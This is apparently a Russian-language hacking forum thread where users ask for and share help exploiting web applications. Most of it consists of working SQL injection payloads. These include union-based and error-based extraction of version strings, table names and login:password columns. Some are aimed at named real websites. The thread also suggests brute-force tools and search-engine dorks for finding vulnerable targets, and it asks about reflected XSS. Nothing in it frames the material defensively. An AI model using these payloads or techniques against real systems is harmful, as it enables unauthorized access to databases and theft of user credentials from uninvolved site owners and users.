Скриптами, прогами. Можно даже легендарной Brutus-AE2(так вроде называется), там брут форм есть и Basic Auth
Anexroid можно заюзать WebBruteForcer И если вход через .htaccess то имя пользователя моет быть уже другим!!
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
копаю движок: PHP: echo " <form method=post> <input type=hidden name=goto value='".$_SERVER['REQUEST_URI']."'> <p>Enter password: <input type=password name=password></p> <p><input type=submit value='Login'></p> </form> "; можно ли провести пассивную-xss атаку? как и в каких браузерах?
как же раскрутить скуль Всем привет! Помогите советом... как составить запрос, что бы хоть чтонить вывелось... ошибки, etc. (не могу дать ссылку, т.к. инфа важная) http://site.com/view.php?id=134 Вот запрос: SELECT * FROM tbl_art WHERE `GRP_ID` IN (0) AND `OBJ_ID` IN (134) При view.php?id=134z SQL ERROR: Unknown column '134z' in 'where clause' При view.php?id=134z() SQL ERROR: Column count of mysql.proc is wrong. Expected 20, found 16. Created with MySQL 50077, now running 50148. Please use mysql_upgrade to fix this error. При view.php?id=999' - выдается сообщение о несуществующей статье (при 999, то же) При view.php?id=134' - стандартная ошибка sql синтаксиса При view.php?id=134)+and+(a SQL ERROR: Unknown column 'a' in 'where clause' При view.php?id=134)+union+select+(a SQL ERROR: Unknown column 'a' in 'field list' При view.php?id=134)+union+select+(user() SQL ERROR: The used SELECT statements have a different number of columns При view.php?id=134)+union+select+(1,2 SQL ERROR: Operand should contain 1 column(s) При view.php?id=134)+union+select+(1),(2),(3),(4 - ошибки нет, но и нет текста статьи При view.php?id=134)+union+select+1,2,3,4--+ - так же, как и выше
Эта тема вопросы а не "Ей чуваки расскрутите скуль за меня!!1" site:свой.сайт.ху* filetypehp inurl:id - и тыкай любимые кавычки!!!
IMMORTAL_S Трудно сказать без ссылки, хотя б в ПМ что ле раздавал ) стандартные комбинации не подходят? Попробуй найти другие бажные скрипты, если есть один вполне вероятно что другие там тоже есть )
IMMORTAL_S iew.php?id=999'+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))--+
[Feldmarschall], ты крут Хотя и пришлось чуть-чуть подправить(не сам код)... но это то что нужно! (метод с Duplicate ложу в копилку) 2 Dare, остался только этот бажный)) Всем спасибо! SQL ERROR: Duplicate entry '5.1.48-log1' for key 'group_key' SQL: SELECT * FROM tbl WHERE `GID` IN (0) AND `OID` IN (134) or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))-- )
Я не могу получить правильное число столбцов и инфицированных колонке для получения данных http://games.cartoonnetworkhq.com/playGame.php?gameID=-229%20union%20all%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
linuxkernal, там двойной запрос. Раскручивать можно только, как слепую инъекцию, тоесть через "and ..."
linuxkernal А если почитать эту тему чуть выше, то можно найти решение Code: http://games.cartoonnetworkhq.com/playGame.php?gameID=133 and+1=(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2))+limit+1)/*
почему не показать table_name? http://www.indiajournal.com/info/event.php?id=3041'+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20from%20information_schema.tables%20where%20table_schema=database() limit 1,1--+
http://www.indiajournal.com/info/event.php?id=3041%27+and+1=2+UnIoN+sElEct+1,tAble_NamE,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,%2021,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36%20%20from%20information_schema.tables%20where%20table_schema=database%28%29%20limit%201,1+--+%27
SQL ругается на "-" в имени базы Всем привет. Впервые столкнулся с такой проблемой... при запросе: Code: http://site.com/view/id/1+union+select+1,2,3,concat_ws(':',login,pass),5+from+[COLOR=DarkOrange]my[/COLOR][COLOR=Red]-[/COLOR][COLOR=DarkOrange]schema[/COLOR].members+limit+0,1--.html выдает ошибку: Code: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[COLOR=Red]-[/COLOR][COLOR=DarkOrange]schema[/COLOR].members limit 0,1--' at line 10 Убрать имя базы из запроса нельзя (хотя мот и есть какие хитрости) - выдает ошибку. Как же разобраться с этой "-" в запросе? ------------------------------------------------------------ Вопрос решен добавлением "`"
в вэбулитен существует возможность при регистрации в email писать все что угодно . как можно это использовать?
